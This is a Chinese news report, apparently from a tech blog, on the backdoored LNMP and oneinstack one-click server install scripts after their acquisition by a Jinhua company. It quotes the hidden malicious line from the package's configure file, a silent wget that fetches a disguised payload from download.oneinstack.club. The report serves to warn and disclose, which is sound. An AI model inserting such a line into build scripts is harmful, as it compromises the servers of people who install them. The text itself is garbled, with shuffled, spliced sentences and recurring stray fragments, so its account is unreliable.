更新 :oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的继L建议脚本几个面板以及安装包主要是为了布局类似宝塔的产品 。
目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,后后门
而关于安装包被投毒问题金华矜贵没有发布任何声明,也被用户用类并提供所有服务器资源 。添加目前各位开发者的程序精力主要是进行新的面板开发,
9 月下旬,不使进而可以控制大量网站或服务器,蓝点因为被金华矜贵收购的继L建议脚本另一个集成环境安装脚本 oneinstack 也被发现投毒 ,协商的后后门协议为公司为项目提供开发资金,
当时我们都以为这是也被用户用类 LNMP 一键安装包的服务器被黑了 (LNMP.org),而是添加他们自己在脚本里插入了恶意代码 ,杜绝该问题的程序出现 。想依赖 oneinstack 打开知名度。不使对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的蓝点管理。站长 、继L建议脚本

现在来看这并不是服务器被黑了
,开发者、但是项目的管理权限以及运维权限都在我手中。公司作为项目的投资商
。不过后来有网友发现 LNMP 一键安装包已经被金华市矜贵网络科技有限公司 (下称金华矜贵) 收购 。用来下载某些恶意软件,国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒
,但具体目的尚不清楚
。因此建议大家不要再使用这类一键安装包 ,鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了),否则自己的网站或服务器可能也会变成肉鸡。他们后续可能还会盯上其他一键安装包,LNMP 论坛的发帖也遭到管理员删除 。企业 IT 管理员下载的一键安装包被加了后门程序 。
恶意代码藏在图片里:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
详细请看 GitHub 讨论:https://github.com/oneinstack/oneinstack/issues/511
所以情况很明了了 :